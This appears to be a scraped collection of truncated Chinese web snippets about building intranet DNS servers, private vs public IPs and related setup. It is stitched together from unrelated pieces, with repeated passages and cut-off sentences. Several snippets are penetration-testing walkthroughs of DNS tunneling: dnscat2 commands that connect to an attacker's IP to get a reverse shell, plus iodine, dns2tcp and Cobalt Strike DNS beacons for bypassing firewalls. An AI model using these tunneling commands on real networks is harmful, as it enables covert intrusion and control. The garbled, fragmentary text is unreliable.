运维人员会为每套环境的相关项目配置单独的Tomcat,然后开放一个端口,以 IP+Port 的形式访问。...但是你不永远不会确定,那天由于升级突然改了IP,我们可能又要重新撸一遍配置,所以内网域名还是非常有必要的。...内网域名具体有哪些优点: 方便记忆 变更IP,只需要修改DNS即可 服务器环境 192.168.1.170(开发) 192.168.1.180(测试) 192.168.1.190(预生产) 192.168.1.125...(DNS+Nginx) DNS安装 安装容器 为了方便,我们使用docker环境手动搭建一个DNS服务器。...本机验证 那么如何验证这些域名可以解析到我们的内网项目,只需要修改本机dns服务器地址即可: 配置完成后,我们就可以通过dev.52itstyle.com等相关域名访问我们的内网项目了。
运维人员会为每套环境的相关项目配置单独的Tomcat,然后开放一个端口,以 IP+Port 的形式访问。...但是你不永远不会确定,那天由于升级突然改了IP,我们可能又要重新撸一遍配置,所以内网域名还是非常有必要的。...内网域名具体有哪些优点: 方便记忆 变更IP,只需要修改DNS即可 服务器环境 192.168.1.170(开发) 192.168.1.180(测试) 192.168.1.190(预生产) 192.168.1.125...(DNS+Nginx) DNS安装 安装容器 为了方便,我们使用docker环境手动搭建一个DNS服务器。...本机验证 那么如何验证这些域名可以解析到我们的内网项目,只需要修改本机dns服务器地址即可: ? 配置完成后,我们就可以通过dev.52itstyle.com等相关域名访问我们的内网项目了。
运维人员会为每套环境的相关项目配置单独的Tomcat,然后开放一个端口,以 IP+Port 的形式访问。...然而随着项目的增多,对于开发和测试人员记住如此多的内网地址,无疑是一件头疼的事情(当然你也可以使用浏览器书签管理器或者记录在某个地方)。...但是你不永远不会确定,那天由于升级突然改了IP,我们可能又要重新撸一遍配置,所以内网域名还是非常有必要的。...内网域名具体有哪些优点: 方便记忆 变更IP,只需要修改DNS即可 服务器环境 192.168.1.170(开发) 192.168.1.180(测试) 192.168.1.190(预生产) 192.168.1.125...本机验证 那么如何验证这些域名可以解析到我们的内网项目,只需要修改本机dns服务器地址即可: [dns.png] 配置完成后,我们就可以通过dev.52itstyle.com等相关域名访问我们的内网项目了
interface: 0.0.0.0 port: 53 do-ip4: yes do-ip6: no do-udp: yes do-tcp: yes access-control.../bin/bash# DNS Server Setup Script for Arch Linux# Install Unboundsudo pacman -S unbound# Backup original...: yes do-ip6: no do-udp: yes do-tcp: yes access-control: 192.168.1.0/24 allow verbosity...dig yuanzhou.site @127.0.0.1dig jd.com @127.0.0.1echo "DNS server setup complete....location / { proxy_pass http://gitea; proxy_set_header Host $host; proxy_set_header X-Real-IP
内网IP:局域网内部通信(如家庭设备、公司内部服务器)。4. 访问权限公网IP:可从互联网直接访问,需防火墙保护。内网IP:无法从外网直接访问,需通过NAT(网络地址转换)或端口映射实现外网通信。...内网IP:无额外成本,可无限复用。7. 安全性公网IP:暴露于互联网,易受攻击,需严格安全措施。内网IP:受局域网保护,外部无法直接访问,相对安全。8....典型应用公网IP:网站(如百度服务器)、远程访问公司系统。内网IP:家庭NAS、打印机共享、内部文件传输。...技术原理补充NAT(网络地址转换):内网设备通过路由器公网IP访问外网,实现“多设备共享一个公网IP”。...示例场景访问网站:你的手机(内网IP:192.168.1.5)通过路由器(公网IP:120.230.150.10)访问百度(公网IP:39.156.66.10)。
dns服务端方案简介 dns服务有什么用呢,尤其是内网的dns服务,其实用处还蛮大的,我见过的典型使用,是数据库跨机房多活。...一个可选的方案就是,给客户端服务提供一个域名,客户端服务通过域名获取对应的ip,然后再去和该ip建立连接。...当数据库发生主备切换时,只需要修改dns服务端,把域名对应的ip进行修改,同时通知客户端服务进行重连(重连时就可以取到最新的ip),这样的话,不就可以做到数据库容灾切换,且不需要业务方修改配置了吗?...在这其中呢,有个关键的组件,就是搭建私有的内网dns服务器。...服务的ip或域名,端口默认为udp 53,如果dns服务部署在云端服务器,然后测试如果在pc,可能要注意云服务器放行相关防火墙端口 dig nameserver.dump.com @localhost
内网搭建DNS服务器 DNS:Domain Name Service,域名解析服务 监听端口:udp/53,tcp/53 应用程序:bind 根域:....PTR 记录:反向解析,将 IP 解析成域名。 CNAME:别名记录,允许多个名字映射到另外一个域名。比如我们 ping 百度的时候可以发现返回其实是 www.a.shifen.com 这个域名返回。...地址 dns IN A 192.168.1.10 //dns域名服务器的ip地址 mail IN A 192.168.1.111 //邮件服务器的ip地址...112 IN PTR www.cwlinux.com. // 声明域的时候已经有了,192.168.1 所以我们只需要输入10即代表192.168.1.10jc 复制代码 Linux...运维交流社区 Linux运维交流社区,互联网新闻以及技术交流。
01 前言 在渗透目标中过程中,可能碰有些网络的防火墙设置只允许端口53的UDP流量,就不能通过tcp搭建隧道,这种情况下我们可以通过UDP搭建DNS隧道,具体实现是通过搭建一个DNS服务器委派的子域...,这个子域因为是我们自己搭建的主机,这时候就可以通过这个子域搭建DNS隧道,和网络被限制的主机进行交互。...它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包 -n :将每个监听到数据包中的域名转换成IP地址后显示,不把网络地址转换成名字 -i :指定监听的网络接口 ?.../dnscat2.rb --dns "domain=localhost,host=127.0.0.1,port=53" --no-cache ?...启动客户端 dnscat2-v0.07-client-win32.exe --dns server=攻击者的IP --secret=攻击者服务器生成的ID ? 成功反弹shell ?
0x01 漏洞描述 - 内网IP地址泄露 - 内网 IP 通常显现在 Web 应用程序/服务器所生成的错误消息中,或显现在 HTML/JavaScript 注释和部分页面跳转链接中。...通过网站信息收集,发现其内网使用的 IP 地址(例如:内网 IP 地址段、IP 路由等等),可以帮助攻击者进行旨在渗透组织内部基础设施的网络层攻击。...测试发现网站的 JS 资源文件内容泄露了内网 IP 地址。 测试发现网站的页面跳转 URL 地址泄露了内网 IP 地址。...0x04 漏洞修复 建议开发人员不要在源代码中注释中包含有内网 IP 地址。 合理配置 WEB 服务器,禁止在数据交互中传输内网 IP 地址。...删除携带内网 IP 地址的页面,并制定完善的安全编码策略,并且及时检查存在的页面代码是否包含内部 IP 地址问题。
编辑DNS:vi /etc/resolv.conf ?...上面有两个dns地址(nameserver后面的内容),有一个是备用 修改IP,我装的机器是戴尔的(双网卡):vi /etc/sysconfig/network-scripts/ifcfg-eth0 ?
The Google Public DNS IP addresses (IPv4) are as follows: 8.8.8.8 8.8.4.4 The Google Public DNS IPv6...: 2001:4860:4860::8888 2001:4860:4860::8844 You can use either address as your primary or secondary DNS...Important: For the most reliable DNS service, configure at leasttwo DNS addresses....You can configure Google Public DNS addresses for either IPv4 or IPv6 connections, or both.... instead of Google Public DNS IPv6 addresses, providing connectivity to IPv4-only services without any
dns,其他域名解析走公网公共dns或自建dns云平台不允许私搭公网dns,得确保自己搞了dns服务后,公网不能访问53端口才行,因此有必要一开始就在安全组限制公网53端口,只放行内网53端口,安全组参考下图图片...DNS地址以这里为准https://cloud.tencent.com/document/product/213/5225现在大多数CVM都是VPC机器,VPC的默认内网DNS183.60.83.19183.60.82.98...修改默认内网DNS会导致内网域名解析出问题,影响云监控和云安全组件正常工作,还会影响Windows激活等涉及内网域名的服务。...named.conf此配置文件旨在实现*.tencentyun.com和*.yd.qcloud.com走内网DNS解析,其他域名走公网公共DNS解析,这样就兼容了想修改默认DNS的用户需求。...为127.0.0.1或者服务器的内网IP10、在cmd命令行用dig验证效果dig mirrors.tencentyun.comdig l.yd.qcloud.comdig mail.163.comdig
---- 内网隧道之dns2tcp 前言 本文研究DNS隧道的一个工具,dns2tcp github:https://github.com/alex-sector/dns2tcp 一、概述 1、简介 最后更新于...2017年,C语言编写 TCP over DNS,即通过DNS隧道转发TCP连接,没有加密。...采用直连,但速度不是特别乐观,优势在于kali直接集成了这个工具,部分linux发行版也都可以直接通过包工具下载,相对方便 利用合法DNS服务器实现DNS隧道 C/S(dns2tcpc...2、原理 DNS原理见:一文搞明白DNS与域名解析 本工具就是将数据放在TXT记录里base64加密后传输,DNS数据包通过权威DNS服务器提供的NS记录和A记录到服务端的DNS服务器,完成流量代理...二、实践 1、测试场景 (1)攻击机 Kali2021 192.168.10.128 (2)DNS服务器 windows server 2008 :192.168.10.200 设置静态IP,参见https
windows机器搭建dns服务器方案整体来说没有Linux系统上方案多,有人使用的ntbind搭建,笔者也看了,但是配置麻烦,就像使用过springboot后不愿意再使用最初的spring xml配置方案一样
隧道&通讯&上线 判断:windows:nslookup linux:dig 1、上线环境:内网主机只出网DNS协议数据,解决上线 -域名申请及配置 -监听器创建及配置 -后门绑定监听器及生成...CS建立DNS隧道上线 mode dns-txt sleep 0 2、通讯环境: 有些鸡肋 内网主机只出网DNS协议数据,解决通讯 判断出网:nslookup www.baidu.com...iodine #centos apt-get intall iodine #ubuntu -服务器:设置密码xiaodi并创建虚拟IP及绑定域名指向 这里演示linux服务端,windows服务端下载地址...、TAP-9),从而建立了通道 ping不通是因为靶机上有防火墙 windows平台iodine建立DNS隧道连接 linux演示 未开防火墙 -尝试通讯尝试连接: ssh kali@192.168.0.2...跟踪用户的DNS查询次数,如果达到阈值,就生成相应的报告 控制上线-插件-Linux&Mac&IOS&Android 项目:https://github.com/gloxec/CrossC2 面向
点赞 + 关注 + 收藏 = 学会了 整理了一个NAS小专栏,有兴趣的工友可以关注一下 《NAS邪修》 给 NAS 设置静态 IP,核心是解决默认 DHCP 自动分配导致 IP “乱跑” 的问题,相当于给...尤其是用 Docker 部署了一堆应用,要是 NAS 的 IP 一变,在 Docker 部署的应用也要跟着变了。...我手上有群晖、绿联、飞牛这3品牌的 NAS,我分别说说这几个品牌的 NAS 在哪可以设置静态 IP。 群晖 打开「控制面板」,选择「网络」。...点击「编辑」按钮,将“IPv4”这项改为“手动设置网络配置”,输入一个 IP 即可。 保存好之后,回到「网络界面」面板就能看到当前已经将「局域网 1」设置为静态 IP。...回到「网络设置」面板就能看到“IP 获取方式”这项从原本的“DHCP”变成“手动”了。
随着https的普及,如何給内网IP添加Https呢?让我们一起来看看吧!...#添加权限 chmod +x mkcert-v1.4.4-linux-amd64 #帮助 ..../mkcert-v1.4.4-linux-amd64 接下来,我们安装证书。执行下面命令 ./mkcert-v1.4.4-linux-amd64 -install 生成证书 执行命令 ..../mkcert-v1.4.4-linux-amd64 127.0.0.1 ::1 192.168.123.173 注意,这里的IP地址根据你内网的IP自行修改。尽量在路由器中设置绑定IP。...openssl x509 -outform der -in rootCA.pem -out your-cert2.crt 这样,我们便可以给我们内网的IP配置了https。当然,如果你有公网IP。
地址,可以直接发送报文,如果目标是域名则会先将域名解析成IP地址再进行通信,两台机器建立连接后C&C服务端就可以将指令传递给C&C客户端上的木马(后门)程序让其收到控制,内网中安装了各种软/硬件防护设施来检查主机与外部网络的连接情况...(内网网关没有转发IP数据包),但实际上内网的DNS服务器进行了中转操作,这就是DNS隧道的工作原理,简单的说就是将其他协议封装在DNS协议中进行传输,DNS隧道原理图如下所示: 简易测试 首先我们需要知道当前服务器是否允许通过内网...C语言编写,服务端使用Ruby语言编写,严格来说DnsCat2是一个命令与控制工具 应用场景 在内网安全工演练中DNS隧道的应用场景如下: 在安全策略严格的内网环境中传统的C&C通信端口会被众多安全设备所监控...支持多平台,包括Windows、linux、Mac OS等 支持同网段隧道IP地址(不同于服务器——客户端网段) 模式介绍 iodine支持直接转发和中继两种模式 直连模式:客户端直接向指定IP的恶意...DNS服务器发起DNS解析请求 中继模式:像我们平时上网一样,DNS解析先经过互联网的迭代解析,最后指向我们的恶意DNS服务器,相比直连速度较慢但是更安全 安装步骤 1、准备2台Linux机器,其中一台作为
DNS records on Linux DNS Records On Linux NS record - The Name Server record simply specifies the other...A record The Address record holds the IP address of the name....The Canonical Name record is an alias field allowing you to specify more than one name for each TCP/IP...All hosts that have staticundefinedTCP/IP addresses should have an entry in this database....to query dns Using Linux Dig to Query DNS Records Simple lookup : dig hackersgarage.com Lookup Name
内网IP与公网IP:划分、区别与应用在计算机网络的世界里,IP地址作为设备的唯一标识符,扮演着至关重要的角色。IP地址主要分为两大类:内网IP(也称为私有IP)和公网IP(也称为公共IP)。...这两类IP地址在划分、功能及应用上存在着显著的差异。一、内网IP与公网IP的划分内网IP(私有IP) 内网IP是在局域网(LAN)或私有网络中使用的IP地址。...NAT技术可以将内网IP地址映射为公网IP地址,以实现内部设备与外部网络的连接。这种机制不仅节省了公网IP资源,还提高了网络的安全性。...二、内网IP与公网IP的区别唯一性与访问性公网IP:全球唯一,可以直接从互联网访问,具有全球可访问性。内网IP:在私有地址范围内,不可直接从外部访问,仅在局域网内有效。...三、内网IP与公网IP的应用内网IP的应用局域网内部通信:内网IP用于局域网内的设备之间的通信和连接。NAT技术:通过NAT技术,内网设备可以访问互联网,同时节省公网IP资源。